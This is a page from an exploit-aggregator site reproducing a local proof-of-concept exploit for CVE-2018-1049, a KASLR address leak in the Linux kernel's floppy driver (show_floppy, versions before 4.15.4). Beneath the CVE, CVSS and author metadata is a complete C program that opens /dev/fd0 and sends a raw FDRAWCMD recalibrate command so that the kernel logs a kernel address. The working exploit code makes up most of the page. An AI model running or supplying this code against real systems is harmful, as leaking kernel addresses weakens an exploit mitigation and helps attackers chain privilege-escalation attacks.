Advertisement






Linux Kernel < 4.15.4 show_floppy KASLR Address Leak

CVE Category Price Severity
CVE-2018-1049 CWE-200 Not specified Medium
Author Risk Exploitation Type Date
Bhumish Gajjar High Local 2018-03-28
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/S:U/C:H/I:N/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018030236

Below is a copy:

Linux Kernel < 4.15.4 show_floppy KASLR Address Leak
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <linux/kernel.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/fd.h>

static int drive_selector(int head) {
            return (head << 2);
}

void fd_recalibrate(int fd) {
                struct floppy_raw_cmd raw_cmd;
                int tmp;

                raw_cmd.flags = FD_RAW_INTR;
                raw_cmd.cmd_count = 2;

                // set up the command
                raw_cmd.cmd[raw_cmd.cmd_count++] = 0x07; 
                raw_cmd.cmd[raw_cmd.cmd_count++] = drive_selector(0); 
                tmp = ioctl( fd, FDRAWCMD, &raw_cmd ); 
                printf("Status:%d\n",tmp); 
} 
int main(){ 
        printf("Start\n"); 
        char *d; 
        struct floppy_raw_cmd *cmd; 
         
        int fd; 
        fd = open("/dev/fd0",O_RDWR | O_NDELAY); 
        fd_recalibrate(fd); 
        close(fd); 
        printf("End\n"); 
        return 0; 
}

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.